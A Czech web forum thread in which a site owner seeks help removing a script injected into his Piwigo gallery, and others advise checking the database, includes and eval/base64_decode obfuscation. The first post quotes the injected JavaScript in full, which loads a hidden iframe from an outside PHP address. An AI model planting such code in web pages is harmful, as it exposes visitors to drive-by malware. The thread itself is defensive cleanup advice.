Autor Zpráva
Pavel Kadlec
Profil
Zdravím

Chtěl bych se zeptat když si dám view-source:http://www.elektromontaze-vk.cz/piwigo/
Tak se zobrazí uvodní stránka piwiga ale jelikož stránky byly napadeny havěti tak zbyva posledni script ktery se mi nedari odstranit protože nevim kde a jak piwigo vytvari hlavní stránku

jedná se o kod na hlavní stránce

<script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          (function () {    var id = '4';    var gocw09 = document.createElement('iframe');    gocw09.src = 'http://hotel-schoener-brunnen.de/traf.php';    gocw09.style.position = 'absolute';    gocw09.style.border = '1';    gocw09.style.height = '31px';    gocw09.style.width = '42px';    gocw09.style.left = '500px';    gocw09.style.top = '100px';    if (!document.getElementById('gocw')) {        document.write('<style>body{overflow-x:hidden;}</style>');        document.write('<div id=\'gocw\' style="position:absolute; width:80%; height:100%;" ></div>');        document.getElementById('gocw').appendChild(gocw09);    }})();</script>

Mužete mi někdo poradit v jakém souboru to najdu? hledám io přes Notepad++ a nic...
scheras
Profil *
To se težko takhle od počítače bez přístupu k systému odhaduje. Doporučil bych Vám prozkoumat databázy, jestli není něco tam. Pokud budete neúspěšný, vzal bych si index.php, ten prohledal a postupoval po souborech, které on si do sebe vkládá. A nebo zkusit vyhledat, jestli nějaký ze souboru neobsahuje klíčová slova jako třeba http://hotel-schoener-brunnen.de apod.
Pavel Kadlec
Profil
scheras:

Já to opravdu právě zkoušel a nic to nenašlo to je jako kdyby to pořád něco generovalo ale nevím kam na FTP nic takového není stáhnul jsem celý obsah a prohledal ho pomocí klíčových slov v textu atd. Jediný tento problém mi to nenašlo jinak vše ostatní jsem v pořádku odstranil.
TomasJ
Profil
Podle mě nenajdete nic podle klíčových slov, protože bude pravděpodobně uložený v nějakém zakódovaném řetězci (např. base64 bývá obvyklé kódování + eval). Zkuste prostě najít nějaký eval, base64_decode a prostě projíždět řádky po řádcích.
Pavel Kadlec
Profil
TomasJ:

Je to vlastně příklad když si najedete na stránku

http://www.elektromontaze-vk.cz/piwigo/ a dáte si zobrazit zdrojový kod tak přesně tu stránku chci najít na FTP ale v indexu a co jsem prolítnul vše nic neni a nemůžu to dohledat:/ to je právě ten jediný zbývajcí script co chybí odstranit, bylo jich tam celkem kolem 200 což se v pořádku odstranilo ale tento jediný zůstává.
TomasJ
Profil
Pavel Kadlec:
Jak říkám, může to být zakódované v base64 a nebo dokonce i tahat z jiné adresy.
Mimochodem na stránce vidím pouze iframe nějaké německé stránky
EDIT: Omlouvám se, o tom přeci píšete...
Pavel Kadlec
Profil
TomasJ:

ano a tu je třeba dát pryč
TomasJ
Profil
Podívejte se jaké soubory includujete za elementem <div> s id the_page. Tam to musí být.
Pavel Kadlec
Profil
TomasJ:

kouknu se na to snad budu mít štěstí
Alphard
Profil
Zmíněný kód už na dané stránce není, takže asi vyřešeno. Nicméně v duchu Máte na webu virus — co s tím? doporučuji pátrat po příčině. Změnit heslo na ftp, zkontrolovat počítač na viry, zkontrolovat, jestli v aplikaci není díra.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: